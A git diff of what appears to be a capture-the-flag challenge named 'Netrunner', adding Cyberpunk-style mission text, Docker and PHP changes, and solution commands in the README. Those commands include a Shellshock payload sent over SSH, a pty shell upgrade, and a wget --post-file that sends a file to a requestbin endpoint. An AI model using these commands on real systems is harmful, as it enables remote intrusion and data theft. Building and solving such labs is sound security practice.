diff --git a/README.md b/README.md
index 430562a..6a9c0f5 100644
--- a/README.md
+++ b/README.md
@@ -1 +1,63 @@
# Netrunner
+
+chmod 777 mariadb
+
+
+###
+
+ssh puppet-master@10.2.0.1 -p 2222 -i ~/.ssh/maintenance '() { :;}; /bin/sh -i'
+
+python3 -c 'import pty; pty.spawn("/bin/sh")'
+
+sudo -g zetatech-maintenance wget --post-file=tech.note https://requestbin.fullcontact.com/XXXX
+
+
+hint Netrunner 2/3: He seems to have a "ghost" in the shell
+
+
+
+
+
+
V, I got a mission for you!
+We discoved a Netrunner who hack neural implants to create false memories. We spotted the target's interface on the Net at this address:
+http://149.202.58.152:8080
+Find out who he is and a way to stop him.
+
+
+
+Nice V! I owe you one!
+But before we go to visit him, I would like to have a means of pressure.
+Here is his maintenance access:
+http://149.202.58.152:2222
+See what you can do and let me know.
+
+
+You doing great!
+But this access is not enough. See if you can get privileged access, the same used by Zetatech technician for maintenance.
+It will allow us to unplug it in case of a glitch.
diff --git a/debian-ssh/Dockerfile b/debian-ssh/Dockerfile
index 38e8b73..9d6046e 100644
--- a/debian-ssh/Dockerfile
+++ b/debian-ssh/Dockerfile
@@ -56,9 +56,9 @@ COPY ./banner /etc/banner
# Configure permissions
RUN chmod -R 550 /home/${user} \
- && chown -R ${user}:${user} /home/${user}/.ssh \
- && chmod 500 /home/${user}/.ssh \
- && chmod 400 /home/${user}/.ssh/authorized_keys \
+ && chown -R root:${user} /home/${user} \
+ && chmod 750 /home/${user}/.ssh \
+ && chmod 440 /home/${user}/.ssh/authorized_keys \
&& chmod 773 /tmp \
&& chmod +t /tmp
diff --git a/docker-compose.yml b/docker-compose.yml
index c251701..7b658bf 100644
--- a/docker-compose.yml
+++ b/docker-compose.yml
@@ -1,4 +1,4 @@
-version: '3'
+version: '2.2'
services:
web:
@@ -39,3 +39,4 @@ services:
ports:
- "2222:22"
restart: always
+ cpus: '.3'
diff --git a/webroot/zetatech-admin.php b/webroot/zetatech-admin.php
index e5637cf..a97591f 100644
--- a/webroot/zetatech-admin.php
+++ b/webroot/zetatech-admin.php
@@ -47,10 +47,14 @@ if (isset($_POST['login']) && $_POST['login'] == 'Login') {
";
$state->string = $html_login;
+ } elseif ( $num_row == 1 && $row['user'] === 'admin') {
+ $state->return = 'false';
+ $state->string = 'admin is desactivated. Use your login.';
} else {
$state->return = 'false';
$state->string = 'Access Denied';
}
+
} else {
$state->return = 'password';
$state->string = 'Password Missing';